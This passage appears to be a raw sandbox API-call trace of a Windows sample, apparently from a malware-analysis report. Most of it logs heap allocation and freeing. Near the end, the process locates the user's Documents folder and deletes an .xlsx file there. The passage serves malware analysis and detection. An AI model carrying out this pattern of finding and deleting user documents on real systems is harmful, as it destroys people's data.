lpMem=0x3551008 | out: hHeap=0x25c0000) returned 1 [0263.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0263.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0263.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0263.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0263.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0263.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0263.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0263.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0263.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0263.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0263.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0263.012] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0263.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0263.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0263.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0263.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0263.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0263.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0263.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0263.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0263.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0263.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0263.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0263.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0263.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0263.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0263.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0263.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0263.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0263.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ac978 [0263.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9c00 [0263.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d50 [0263.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0263.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa050 [0263.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0263.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0263.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f78 [0263.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0263.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0263.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0263.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0263.014] CloseHandle (hObject=0x294) returned 1 [0263.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0263.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0263.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x3561010 | out: hHeap=0x25c0000) returned 1 [0263.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0263.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0263.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0263.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0263.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0263.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0263.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0263.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0263.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0263.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0263.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0263.029] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0263.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0263.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0263.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0263.030] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0263.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0263.030] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0263.030] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0263.030] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0263.030] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0263.030] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0263.030] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0263.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0263.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0263.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0263.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0263.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0263.030] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0263.030] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0263.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0263.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0263.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0263.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0263.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0263.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0263.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0263.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0263.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0263.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0263.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0263.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0263.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0263.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0263.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0263.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0263.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0263.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0263.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0263.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0263.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0263.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0263.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0263.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0263.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0263.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0263.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0263.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0263.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0263.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0263.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0263.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0263.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0263.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0263.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0263.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0263.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0263.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0263.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0263.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0263.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0263.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0263.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0263.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0263.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0263.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b7a48 | out: hHeap=0x25c0000) returned 1 [0263.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0263.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0263.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0263.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0263.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0263.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0263.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0263.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0263.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0263.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0263.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0263.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0263.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0263.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0263.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0263.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0263.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0263.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0263.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0263.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2420898 | out: hHeap=0x25c0000) returned 1 [0263.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0263.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0263.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0263.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0263.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0263.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0263.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0263.035] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0263.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0263.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0263.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0263.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0263.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0263.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0263.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0263.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0263.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0263.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0263.036] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0263.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0263.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0263.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d68 [0263.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0263.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0263.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa1b8 [0263.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0263.036] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0263.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0263.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0263.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0263.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0263.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0263.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0263.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0263.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0263.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0263.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0263.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0263.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0263.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0263.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0263.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0263.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0263.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x24207f0 [0263.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0263.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0263.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0263.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0263.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0263.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0263.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0263.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0263.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0263.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0263.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0263.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x64) returned 0x24202f0 [0263.038] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/IqPW.xlsx", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\IqPW.xlsx", lpFilePart=0x8bedfc*="IqPW.xlsx") returned 0x31 [0263.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24202f0 | out: hHeap=0x25c0000) returned 1 [0263.038] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\IqPW.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\iqpw.xlsx")) returned 0x20 [0263.038] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\IqPW.xlsx", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x60886d20, ftCreationTime.dwHighDateTime=0x1d4e258, ftLastAccessTime.dwLowDateTime=0x9b4fc9f0, ftLastAccessTime.dwHighDateTime=0x1d4dc57, ftLastWriteTime.dwLowDateTime=0x9b4fc9f0, ftLastWriteTime.dwHighDateTime=0x1d4dc57, nFileSizeHigh=0x0, nFileSizeLow=0x182e1, dwReserved0=0x1c18, dwReserved1=0x4, cFileName="IqPW.xlsx", cAlternateFileName="IQPW~1.XLS")) returned 0xaa5760 [0263.038] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\IqPW.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\iqpw.xlsx")) returned 1 [0263.040] FindNextFileW (in: hFindFile=0xaa5760, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x60886d20, ftCreationTime.dwHighDateTime=0x1d4e258, ftLastAccessTime.dwLowDateTime=0x9b4fc9f0, ftLastAccessTime.dwHighDateTime=0x1d4dc57, ftLastWriteTime.dwLowDateTime=0x9b4fc9f0, ftLastWriteTime.dwHighDateTime=0x1d4dc57, nFileSizeHigh=0x0, nFileSizeLow=0x182e1, dwReserved0=0x1c18, dwReserved1=0x4, cFileName="IqPW.xlsx", cAlternateFileName="IQPW~1.XLS")) returned 0 [0263.041] FindClose (in: hFindFile=0xaa5760 | out: hFindFile=0xaa5760) returned 1 [0263.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0263.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0263.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0263.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0263.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0263.041] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0263.041] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0263.041] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0263.041] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0263.041] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0263.041] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0263.041] RtlAllocateHeap (HeapHandle=0x25c0000, 